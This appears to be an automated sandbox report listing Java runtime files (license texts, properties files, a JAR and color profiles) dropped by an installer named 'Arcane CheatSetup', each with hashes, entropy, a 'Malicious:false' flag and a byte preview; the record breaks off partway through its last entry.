                                Preview:Copyright . 1993, 2016, Oracle and/or its affiliates...All rights reserved.....This software and related documentation are provided under a..license agreement containing restrictions on use and..disclosure and are protected by intellectual property laws...Except as expressly permitted in your license agreement or..allowed by law, you may not use, copy, reproduce, translate,..broadcast, modify, license, transmit, distribute, exhibit,..perform, publish, or display any part, in any form, or by..any means. Reverse engineering, disassembly, or..decompilation of this software, unless required by law for..interoperability, is prohibited.....The information contained herein is subject to change..without notice and is not warranted to be error-free. If you..find any errors, please report them to us in writing.....If this is software or related documentation that is..delivered to the U.S. Government or anyone licensing it on..behalf of the U.S. Government, the following notice is..applicable:...

                                C:\Program Files (x86)\Arcane Cheat\jre\is-KASLN.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):111645
                                Entropy (8bit):4.8590909329531025
                                Encrypted:false
                                SSDEEP:1536:iiVRF8bLuepEvc5O5YwT3JJ4WOHHA/AFjrlHyEepdfZ9JIH4gDq:dRMiCOjJJ4pg/0Hx9MlZ9KH47
                                MD5:0E05BD8B9BFCF17F142445D1F8C6561C
                                SHA1:CF0A9F4040603008891AA0731ABF89CE2403F2FB
                                SHA-256:C3EA3996241B8E9AE7DB3780E470174076FD2003D8AEFAA77BF0BAB5E04DE050
                                SHA-512:07C7865D31D22BA0C68E384AFEDC22261F7B3A82BEBC9324145FF7F631623ECA2DC31C71CDBBFC9FEBC1733451A095302DE2A0877821A5B68038E350969BF460
                                Malicious:false
                                Preview:.DO NOT TRANSLATE OR LOCALIZE....***************************************************************************....%%The following software may be included in this product:..Microsoft DirectShow - Base Classes....Use of any of this software is governed by the terms of the license below:....MSDN - Information on Terms of Use....Updated: February 13, 2008....ON THIS PAGE.... * ACCEPTANCE OF TERMS.. * PRIVACY AND PROTECTION OF PERSONAL INFORMATION.. * NOTICE SPECIFIC TO APIs AVAILABLE ON THIS WEB SITE.. * NOTICE SPECIFIC TO SOFTWARE AVAILABLE ON THIS WEB SITE.. * NOTICE SPECIFIC TO DOCUMENTATION AVAILABLE ON THIS WEB SITE.. * NOTICES REGARDING SOFTWARE, DOCUMENTATION, APIS AND SERVICES AVAILABLE ON..THIS WEB SITE.. * RESERVATION OF RIGHTS.. * MEMBER ACCOUNT, PASSWORD, AND SECURITY.. * NO UNLAWFUL OR PROHIBITED USE.. * USE OF SERVICES.. * MATERIALS PROVIDED TO MICROSOFT OR POSTED AT ANY MICROSOFT WEB SITE.. * NOTICES AND PROCEDURE FOR MAKING CLAIMS OF COP

                                C:\Program Files (x86)\Arcane Cheat\jre\is-NCUG3.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:HTML document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):983
                                Entropy (8bit):5.135635144562017
                                Encrypted:false
                                SSDEEP:24:+STATDcxWpAVjXQ5cjaJ2gjQo4OSED6R8R/TtDpM:+STATD7pqjXBeJdso4OnxRc
                                MD5:3CB773CB396842A7A43AD4868A23ABE5
                                SHA1:ACE737F039535C817D867281190CA12F8B4D4B75
                                SHA-256:F450AEE7E8FE14512D5A4B445AA5973E202F9ED1E122A8843E4DC2D4421015F0
                                SHA-512:6058103B7446B61613071C639581F51718C12A9E7B6ABD3CF3047A3093C2E54B2D9674FAF9443570A3BB141F839E03067301FF35422EB9097BD08020E0DD08A4
                                Malicious:false
                                Preview:<html>..<head>..<title>..Welcome to the Java(TM) Platform..</title>..</head>..<body>....<h2>Welcome to the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> Platform</h2>..<p> Welcome to the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> Standard Edition Runtime .. Environment. This provides complete runtime support for Java applications. ..<p> The runtime environment includes the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> .. Plug-in product which supports the Java environment inside web browsers. ..<h3>References</h3>..<p>..See the <a href="http://download.oracle.com/javase/7/docs/technotes/guides/plugin/">Java Plug-in</a> product..documentation for more information on using the Java Plug-in product...<p> See the <a href=.."http://www.oracle.com/technetwork/java/javase/overview/"..>Java Platform</a> web site for .. more information on the Java Platform. ..<hr>..<font size="-2">..Copyright (c) 2006, 2016, Oracle and/or its affiliates. All rights reserved...</font>..<p>..</body>..</html>..

                                C:\Program Files (x86)\Arcane Cheat\jre\is-P3EBR.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):41
                                Entropy (8bit):4.271470906740504
                                Encrypted:false
                                SSDEEP:3:c3AXFshzhRSkv:c9hzhgkv
                                MD5:67CB88F6234B6A1F2320A23B197FA3F6
                                SHA1:877ACEBA17B28CFFF3F5DF664E03B319F23767A1
                                SHA-256:263E21F4B43C118A8B4C07F1A8ACB11CAFC232886834433E34187F5663242360
                                SHA-512:4D43E5EDECAB92CEBD853204C941327DCCBFD071A71F066C12F7FB2F1B2DEF59C37A15CE05C4FE06EC2EA296B8630C4E938254A8A92E149E4A0A82C4307D648F
                                Malicious:false
                                Preview:Please refer to http://java.com/license..

                                C:\Program Files (x86)\Arcane Cheat\jre\is-S4OCV.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):47
                                Entropy (8bit):4.2563005536211715
                                Encrypted:false
                                SSDEEP:3:c3AXFshzhRSkjn:c9hzhgkjn
                                MD5:4BDA1F1B04053DCFE66E87A77B307BB1
                                SHA1:B8B35584BE24BE3A8E1160F97B97B2226B38FA7D
                                SHA-256:FD475B1619675B9FB3F5CD11D448B97EDDEE8D1F6DDCCA13DED8BC6E0CAA9CF3
                                SHA-512:997CEE676018076E9E4E94D61EC94D5B69B148B3152A0148E70D0BE959533A13AD0BC1E8B43268F91DB08B881BF5050A6D5C157D456597260A2B332A48068980
                                Malicious:false
                                Preview:Please refer to http://java.com/licensereadme..

                                C:\Program Files (x86)\Arcane Cheat\jre\is-TG8N3.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):180668
                                Entropy (8bit):5.064180003233063
                                Encrypted:false
                                SSDEEP:3072:54ct+BcF1N7m8arf1kHRSusX2NyJ9KH4PF4j52eTjLAzE7GzmCK+XNhalQxkM8QB:N7mtrf1GhMF4j5RMGQoyzaXmR
                                MD5:0E87879F452892B85C81071A1DDD5A2A
                                SHA1:2CF97C1A84374A6FBBD5D97FE1B432FA799C3B19
                                SHA-256:9C18836FD0B5E4B0C57CFFDB74574FA5549085C3B327703DC8EFE4208F4E3321
                                SHA-512:10BA68FFD9DEAB10A0B200707C3AF9E95E27AED004F66F049D41310CB041B7618EE017219C848912D5951599208D385BCB928DD33175652101C7E5BC2E3EBA5B
                                Malicious:false
                                Preview:DO NOT TRANSLATE OR LOCALIZE...-----------------------------....%% This notice is provided with respect to ASM Bytecode Manipulation ..Framework v5.0.3, which may be included with JRE 8, and JDK 8, and ..OpenJDK 8.....--- begin of LICENSE ---....Copyright (c) 2000-2011 France T.l.com..All rights reserved.....Redistribution and use in source and binary forms, with or without..modification, are permitted provided that the following conditions..are met:....1. Redistributions of source code must retain the above copyright.. notice, this list of conditions and the following disclaimer.....2. Redistributions in binary form must reproduce the above copyright.. notice, this list of conditions and the following disclaimer in the.. documentation and/or other materials provided with the distribution.....3. Neither the name of the copyright holders nor the names of its.. contributors may be used to endorse or promote products derived from.. this software without specific prior written

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\accessibility.properties (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):155
                                Entropy (8bit):4.618267268558291
                                Encrypted:false
                                SSDEEP:3:nSkoZgZLXnuWxVEsTwVAAiuKIn7IRAdSPGGzJ0vwQAnfMaAHCRyvy:nBcAPWEwVAkIiSPhwwpkaAHCIa
                                MD5:9E5E954BC0E625A69A0A430E80DCF724
                                SHA1:C29C1F37A2148B50A343DB1A4AA9EB0512F80749
                                SHA-256:A46372B05CE9F40F5D5A775C90D7AA60687CD91AAA7374C499F0221229BF344E
                                SHA-512:18A8277A872FB9E070A1980EEE3DDD096ED0BBA755DB9B57409983C1D5A860E9CBD3B67E66FF47852FE12324B84D4984E2F13859F65FABE2FF175725898F1B67
                                Malicious:false
                                Preview:#..# Load the Java Access Bridge class into the JVM..#..#assistive_technologies=com.sun.java.accessibility.AccessBridge..#screen_magnifier_present=true....

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\calendars.properties (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1438
                                Entropy (8bit):5.214662998532387
                                Encrypted:false
                                SSDEEP:24:QVDpdQYHLOVhl86bePCkHUMCLC9TFcgg+DR+Oby:MQ4LOVh2WGfUMCLC9Zcgg2Ru
                                MD5:92BA2D87915E6F7F58D43344DF07E1A6
                                SHA1:872BC54E53377AAC7C7616196BCCE1DB6A3F0477
                                SHA-256:68F0CF30429A42A6FE78B1DE91970E5C78FD03D1599BEB080C1C196D5C59E4C0
                                SHA-512:A964E2CEB4D601FAF28ECF13FB11777B70708C21CF9EA23721E462B6E911051108B8A42EBF6447FA49CB61D7FA2D79475F50EE791F1121616371E2B02FAB71B6
                                Malicious:false
                                Preview:# Copyright (c) 2005, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....#..# Japanese imperial calendar..#..# Meiji since 1868-01-01 00:00:00 local time (Gregorian)..# Taisho since 1912-07-30 00:00:00 local time (Gregorian)..# Showa since 1926-12-25 00:00:00 local time (Gregorian)..# Heisei since 1989-01-08 00:00:00 local time (Gregorian)..calendar.japanese.type: LocalGregorianCalendar..calendar.japanese.eras: \...name=Meiji,abbr=M,since=-3218832000000; \...name=Taisho,abbr=T,since=-1812153600000; \...name=Showa,abbr=S,since=-1357603200000; \...name=Heisei,abbr=H,since=600220800000....#..# Taiwanese calendar..# Minguo since 1911-01-01 00:00:00 local time (Gregorian)..calendar.taiwanese.type: LocalGregorianCalendar..calendar.taiwanese.eras: \...name=MinGuo,since=-1830384000000....#..# Thai Buddhist calendar..# Buddhist Era since -5

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\charsets.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):3091908
                                Entropy (8bit):6.633254981822853
                                Encrypted:false
                                SSDEEP:49152:puZi4j4TQkgaSOHEhjy2twRYEc1sJzlbguMuD:puZiW4smxGocuJlbgq
                                MD5:0B3923ABB0D48FDAE7A2306717967B39
                                SHA1:0882294FFEC2769023AA36FF9CC53562F8E26020
                                SHA-256:E88AEC2A49F07CAC9471D9E4C113FA189600B57245685814D043C20EA8A8B471
                                SHA-512:CF622081B290140CE8419B30FB25442F7204C9A37E1490030A4D656F66C509946F48C50CC7794DA51007EFB202805605FE3C2AC3534D63FBF928EA35CE16A040
                                Malicious:false
                                Preview:PK........s..H................META-INF/....PK........s..H<:S1D...D.......META-INF/MANIFEST.MFManifest-Version: 1.0..Created-By: 1.7.0_07 (Oracle Corporation)....PK...........HUi..............sun/nio/cs/ext/Big5.class.......4."..........t....t............................................................................................................................................................................................................................................................................................................................................................................~.........b2cSBStr...Ljava/lang/String;...ConstantValue...b2cStr...[Ljava/lang/String;...b2c...[[C...b2cSB...[C...b2cInitialized...Z...c2b...c2bIndex...c2bInitialized...<init>...()V...Code...LineNumberTable...historicalName...()Ljava/lang/String;...contains...(Ljava/nio/charset/Charset;)Z...StackMapTable...newDecoder..#()Ljava/nio/charset/CharsetDecoder;...newEncoder..#()Ljava/nio/charset/Ch

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\classlist (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):84355
                                Entropy (8bit):4.927199323446014
                                Encrypted:false
                                SSDEEP:1536:4X/nxfn5rxLyMznYolTzlff5OK3COHoHNG5rb/cxNwmCX1g86K2oWdAqNqc+KMjD:qxn5rxLyMzbf5OK3CJNG51g86A
                                MD5:7FC71A62D85CCF12996680A4080AA44E
                                SHA1:199DCCAA94E9129A3649A09F8667B552803E1D0E
                                SHA-256:01FE24232D0DBEFE339F88C44A3FD3D99FF0E17AE03926CCF90B835332F5F89C
                                SHA-512:B0B9B486223CF79CCF9346AAF5C1CA0F9588247A00C826AA9F3D366B7E2EF905AF4D179787DCB02B32870500FD63899538CF6FAFCDD9B573799B255F658CEB1D
                                Malicious:false
                                Preview:java/lang/Object..java/lang/String..java/io/Serializable..java/lang/Comparable..java/lang/CharSequence..java/lang/Class..java/lang/reflect/GenericDeclaration..java/lang/reflect/AnnotatedElement..java/lang/reflect/Type..java/lang/Cloneable..java/lang/ClassLoader..java/lang/System..java/lang/Throwable..java/lang/Error..java/lang/ThreadDeath..java/lang/Exception..java/lang/RuntimeException..java/lang/SecurityManager..java/security/ProtectionDomain..java/security/AccessControlContext..java/security/SecureClassLoader..java/lang/ClassNotFoundException..java/lang/ReflectiveOperationException..java/lang/NoClassDefFoundError..java/lang/LinkageError..java/lang/ClassCastException..java/lang/ArrayStoreException..java/lang/VirtualMachineError..java/lang/OutOfMemoryError..java/lang/StackOverflowError..java/lang/IllegalMonitorStateException..java/lang/ref/Reference..java/lang/ref/SoftReference..java/lang/ref/WeakReference..java/lang/ref/FinalReference..java/lang/ref/PhantomReference..sun/misc/Cleaner

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\cmm\CIEXYZ.pf (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Sun KCMS color profile 2.0, type KCMS, XYZ/XYZ-spac device, 51236 bytes, 2-12-1997 18:50:04, dependently, PCS X=0xf6b3 Z=0xd2f8 "XYZ to XYZ Identity Profile"
                                Category:dropped
                                Size (bytes):51236
                                Entropy (8bit):7.226972359973779
                                Encrypted:false
                                SSDEEP:1536:2Qnt0y7xFNksbeCqY39JJ8GmaNo68GmaNo68GmaNoW:JOy7xXjtqYNfHxNo6HxNo6HxNoW
                                MD5:10F23396E21454E6BDFB0DB2D124DB85
                                SHA1:B7779924C70554647B87C2A86159CA7781E929F8
                                SHA-256:207D748A76C10E5FA10EC7D0494E31AB72F2BACAB591371F2E9653961321FE9C
                                SHA-512:F5C5F9FC3C4A940D684297493902FD46F6AA5248D2B74914CA5A688F0BAD682831F6060E2264326D2ECB1F3544831EB1FA029499D1500EA4BFE3B97567FE8444
                                Malicious:false
                                Preview:...$KCMS....spacXYZ XYZ .........2..acspSUNW....KODA.ODA............................................................................A2B0.......4B2A0.......4cprt.......Gwtpt...T....desc...h....K070........K071........mft2................................................................................................................ !!""##$$%%&&''(())**++,,--..//00112233445566778899::;;<<==>>??@@AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZ[[\\]]^^__``aabbccddeeffgghhiijjkkllmmnnooppqqrrssttuuvvwwxxyyzz{{||}}~~.................................................................................................................................................................................................................................................................................................................................. !!""##$$%%&&''(())**++,,--..//00112233445566778899::;;<<==>>??@@AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZ[[\\]]^^__``aabbccddeeffgghhiijjkkllmm

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\cmm\GRAY.pf (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Sun KCMS color profile 2.0, type KCMS, GRAY/XYZ-mntr device, KODA/GRAY model, 632 bytes, 27-7-95 17:30:15, embedded, relative colorimetric, PCS Z=0xd32b "KODAK Grayscale Conversion - Gamma 1.0"
                                Category:dropped
                                Size (bytes):632
                                Entropy (8bit):3.7843698642539243
                                Encrypted:false
                                SSDEEP:12:51AP3fJgXQ531yqQac/lkgz42WlHlYujlOl9Fhl:vA2XQCqpUlkgzulHiXl3hl
                                MD5:1002F18FC4916F83E0FC7E33DCC1FA09
                                SHA1:27F93961D66B8230D0CDB8B166BC8B4153D5BC2D
                                SHA-256:081CAAC386D968ADD4C2D722776E259380DCF78A306E14CC790B040AB876D424
                                SHA-512:334D932D395B46DFC619576B391F2ADC2617E345AFF032B592C25E333E853735DA8B286EF7542EB19059CDE8215CDCEA147A3419ED56BDD6006CA9918D0618E1
                                Malicious:false
                                Preview:...xKCMS....mntrGRAYXYZ ._..........acspSUNW....KODAGRAY.......................+....................................................cprt.......?desc........dmnd.......`wtpt........kTRC........dmdd.......dtext....COPYRIGHT (c) 1997 Eastman Kodak, All rights reserved...desc.......'KODAK Grayscale Conversion - Gamma 1.0..................@...............~.......................~.......~..............desc........KODAK..................@..................................................,...,....XYZ ...............+curv............desc........Grayscale..................@..................................................,...,....

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\cmm\LINEAR_RGB.pf (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:color profile 2.0, type KCMS, RGB/XYZ-mntr device by KODK, 1044 bytes, 2-2-1998, PCS Z=0xd32c "linear sRGB"
                                Category:dropped
                                Size (bytes):1044
                                Entropy (8bit):6.510788634170065
                                Encrypted:false
                                SSDEEP:6:zwuau/7De0/q98EAsBIMD/WvaKIV4R0/lCAEdD0WlV9AEdwKKt/n3knR3lfR/NHD:zw7ePB/rEAsBIkVuUlAYKu/nUnKw
                                MD5:A387B65159C9887265BABDEF9CA8DAE5
                                SHA1:7913274C2F73BAFCF888F09FF60990B100214EDE
                                SHA-256:712036AA1951427D42E3E190E714F420CA8C2DD97EF01FCD0675EE54B920DB46
                                SHA-512:359D9B57215855F6794E47026C06036B93710998205D0817C6E602B2A24DAEB92537C388F129407461FC60180198F02A236AEB349A17430ED7AC85A1E5F71350
                                Malicious:false
                                Preview:....KCMS....mntrRGB XYZ ............acsp........KODK...........................,KODK................................................cprt.......Hdesc...8....rXYZ........gXYZ........bXYZ........rTRC........gTRC........bTRC........wtpt........text....Copyright (c) Eastman Kodak Company, 1998, all rights reserved..desc........linear sRGB............l.i.n.e.a.r. .s.R.G.B.....linear sRGB........................................................XYZ ......m...6.....XYZ ......e........!XYZ ......#B...^...Kcurv........................................................................ !!""##$$%%&&''(())**++,,--..//00112233445566778899::;;<<==>>??@@AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZ[[\\]]^^__``aabbccddeeffgghhiijjkkllmmnnooppqqrrssttuuvvwwxxyyzz{{||}}~~..........................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\cmm\PYCC.pf (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Sun KCMS color profile 2.0, type KCMS, 3CLR/Lab-spac device, 274474 bytes, 6-11-1996 7:50:04, PCS X=0xf6b3 Z=0xd2f8 "Std Photo YCC Print"
                                Category:dropped
                                Size (bytes):274474
                                Entropy (8bit):7.843290819622709
                                Encrypted:false
                                SSDEEP:6144:nJleRNRyAnAqNaADEJHeeeeevoAuaiqwV6sg0pUjRVgYgI:nJleRNRpN0j3qhjRC9I
                                MD5:24B9DEE2469F9CC8EC39D5BDB3901500
                                SHA1:4F7EED05B8F0EEA7BCDC8F8F7AAEB1925CE7B144
                                SHA-256:48122294B5C08C69B7FE1DB28904969DCB6EDC9AA5076E3F8768BF48B76204D0
                                SHA-512:D23CE2623DE400216D249602486F21F66398B75196E80E447143D058A07438919A78AE0ED2DDF8E80D20BD70A635D51C9FB300E9F08A4751E00CD21883B88693
                                Malicious:false
                                Preview:..0*KCMS....spac3CLRLab .........2..acspSUNW....KODAnone............................................................................A2B0... ...4B2A0...T..f4cprt..-....Gdmnd..-....ndmdd...@...zwtpt........desc.......nK013../@....K019../L....K030../.....K031..0.....K070..0.....K071..0 ....mft2.....................................................K.S.8.....l.....0...3.........U.. .!h".$.%\&.'.)5*y+.,..5/o0.1.3.4E5v6.7.8.:*;S<z=.>.?.A.B,CLDkE.F.G.H.I.K.L!M7NLO`PsQ.R.S.T.U.V.W.X.Y.[.\.].^._%`,a2b8c=dAeEfHgJhLiMjMkMlLmKnIoFpCq@r;s7t1u,v%w.x.y.z.z.{.|.}.~...............p.b.S.C.3.#..............~.j.U.@.+.............t.\.C.*...........r.W.;...........p.R.3..........w.V.6.........l.J.'........v.R.-.......t.N.(.......f.?........v.N.%........U.+.......U.*......z.N."......n.@.......Z.+......o.@.........P. .......\.+.......d.1...........................z.p.f.[.Q.G.=.3.). ........................ .!.".#.$.%.&{'s(k)d*]+U,N-G.@/9021,2%3.4.5.6.7.8.8.9.:.;.<.=.>.?.@.A.B.C.D.E.F.

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\cmm\is-1B792.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Sun KCMS color profile 2.0, type KCMS, 3CLR/Lab-spac device, 274474 bytes, 6-11-1996 7:50:04, PCS X=0xf6b3 Z=0xd2f8 "Std Photo YCC Print"
                                Category:dropped
                                Size (bytes):274474
                                Entropy (8bit):7.843290819622709
                                Encrypted:false
                                SSDEEP:6144:nJleRNRyAnAqNaADEJHeeeeevoAuaiqwV6sg0pUjRVgYgI:nJleRNRpN0j3qhjRC9I
                                MD5:24B9DEE2469F9CC8EC39D5BDB3901500
                                SHA1:4F7EED05B8F0EEA7BCDC8F8F7AAEB1925CE7B144
                                SHA-256:48122294B5C08C69B7FE1DB28904969DCB6EDC9AA5076E3F8768BF48B76204D0
                                SHA-512:D23CE2623DE400216D249602486F21F66398B75196E80E447143D058A07438919A78AE0ED2DDF8E80D20BD70A635D51C9FB300E9F08A4751E00CD21883B88693
                                Malicious:false
                                Preview:..0*KCMS....spac3CLRLab .........2..acspSUNW....KODAnone............................................................................A2B0... ...4B2A0...T..f4cprt..-....Gdmnd..-....ndmdd...@...zwtpt........desc.......nK013../@....K019../L....K030../.....K031..0.....K070..0.....K071..0 ....mft2.....................................................K.S.8.....l.....0...3.........U.. .!h".$.%\&.'.)5*y+.,..5/o0.1.3.4E5v6.7.8.:*;S<z=.>.?.A.B,CLDkE.F.G.H.I.K.L!M7NLO`PsQ.R.S.T.U.V.W.X.Y.[.\.].^._%`,a2b8c=dAeEfHgJhLiMjMkMlLmKnIoFpCq@r;s7t1u,v%w.x.y.z.z.{.|.}.~...............p.b.S.C.3.#..............~.j.U.@.+.............t.\.C.*...........r.W.;...........p.R.3..........w.V.6.........l.J.'........v.R.-.......t.N.(.......f.?........v.N.%........U.+.......U.*......z.N."......n.@.......Z.+......o.@.........P. .......\.+.......d.1...........................z.p.f.[.Q.G.=.3.). ........................ .!.".#.$.%.&{'s(k)d*]+U,N-G.@/9021,2%3.4.5.6.7.8.8.9.:.;.<.=.>.?.@.A.B.C.D.E.F.

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\cmm\is-7KC82.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Sun KCMS color profile 2.0, type KCMS, XYZ/XYZ-spac device, 51236 bytes, 2-12-1997 18:50:04, dependently, PCS X=0xf6b3 Z=0xd2f8 "XYZ to XYZ Identity Profile"
                                Category:dropped
                                Size (bytes):51236
                                Entropy (8bit):7.226972359973779
                                Encrypted:false
                                SSDEEP:1536:2Qnt0y7xFNksbeCqY39JJ8GmaNo68GmaNo68GmaNoW:JOy7xXjtqYNfHxNo6HxNo6HxNoW
                                MD5:10F23396E21454E6BDFB0DB2D124DB85
                                SHA1:B7779924C70554647B87C2A86159CA7781E929F8
                                SHA-256:207D748A76C10E5FA10EC7D0494E31AB72F2BACAB591371F2E9653961321FE9C
                                SHA-512:F5C5F9FC3C4A940D684297493902FD46F6AA5248D2B74914CA5A688F0BAD682831F6060E2264326D2ECB1F3544831EB1FA029499D1500EA4BFE3B97567FE8444
                                Malicious:false
                                Preview:...$KCMS....spacXYZ XYZ .........2..acspSUNW....KODA.ODA............................................................................A2B0.......4B2A0.......4cprt.......Gwtpt...T....desc...h....K070........K071........mft2................................................................................................................ !!""##$$%%&&''(())**++,,--..//00112233445566778899::;;<<==>>??@@AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZ[[\\]]^^__``aabbccddeeffgghhiijjkkllmmnnooppqqrrssttuuvvwwxxyyzz{{||}}~~.................................................................................................................................................................................................................................................................................................................................. !!""##$$%%&&''(())**++,,--..//00112233445566778899::;;<<==>>??@@AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZ[[\\]]^^__``aabbccddeeffgghhiijjkkllmm

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\cmm\is-7UU59.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Microsoft color profile 2.1, type Lino, RGB/XYZ-mntr device, IEC/sRGB model by HP, 3144 bytes, 9-2-1998 6:49:00 "sRGB IEC61966-2.1"
                                Category:dropped
                                Size (bytes):3144
                                Entropy (8bit):7.026867070945169
                                Encrypted:false
                                SSDEEP:48:+FflsXlf/lulel4wlwx+6MjnNsvIYWiR5QkyTJbZPHXZ9u6gbVwyKzJgWjU:aN26MT0D5MdtbZPAVwzV0
                                MD5:1D3FDA2EDB4A89AB60A23C5F7C7D81DD
                                SHA1:9EAEA0911D89D63E39E95F2E2116EAEC7E0BB91E
                                SHA-256:2B3AA1645779A9E634744FAF9B01E9102B0C9B88FD6DECED7934DF86B949AF7E
                                SHA-512:16AAE81ACF757036634B40FB8B638D3EBA89A0906C7F95BD915BC3579E3BE38C7549EE4CD3F344EF0A17834FF041F875B9370230042D20B377C562952C47509B
                                Malicious:false
                                Preview:...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................view.........._.....

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\cmm\is-G1NLE.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Sun KCMS color profile 2.0, type KCMS, GRAY/XYZ-mntr device, KODA/GRAY model, 632 bytes, 27-7-95 17:30:15, embedded, relative colorimetric, PCS Z=0xd32b "KODAK Grayscale Conversion - Gamma 1.0"
                                Category:dropped
                                Size (bytes):632
                                Entropy (8bit):3.7843698642539243
                                Encrypted:false
                                SSDEEP:12:51AP3fJgXQ531yqQac/lkgz42WlHlYujlOl9Fhl:vA2XQCqpUlkgzulHiXl3hl
                                MD5:1002F18FC4916F83E0FC7E33DCC1FA09
                                SHA1:27F93961D66B8230D0CDB8B166BC8B4153D5BC2D
                                SHA-256:081CAAC386D968ADD4C2D722776E259380DCF78A306E14CC790B040AB876D424
                                SHA-512:334D932D395B46DFC619576B391F2ADC2617E345AFF032B592C25E333E853735DA8B286EF7542EB19059CDE8215CDCEA147A3419ED56BDD6006CA9918D0618E1
                                Malicious:false
                                Preview:...xKCMS....mntrGRAYXYZ ._..........acspSUNW....KODAGRAY.......................+....................................................cprt.......?desc........dmnd.......`wtpt........kTRC........dmdd.......dtext....COPYRIGHT (c) 1997 Eastman Kodak, All rights reserved...desc.......'KODAK Grayscale Conversion - Gamma 1.0..................@...............~.......................~.......~..............desc........KODAK..................@..................................................,...,....XYZ ...............+curv............desc........Grayscale..................@..................................................,...,....

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\cmm\is-U96LM.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:color profile 2.0, type KCMS, RGB/XYZ-mntr device by KODK, 1044 bytes, 2-2-1998, PCS Z=0xd32c "linear sRGB"
                                Category:dropped
                                Size (bytes):1044
                                Entropy (8bit):6.510788634170065
                                Encrypted:false
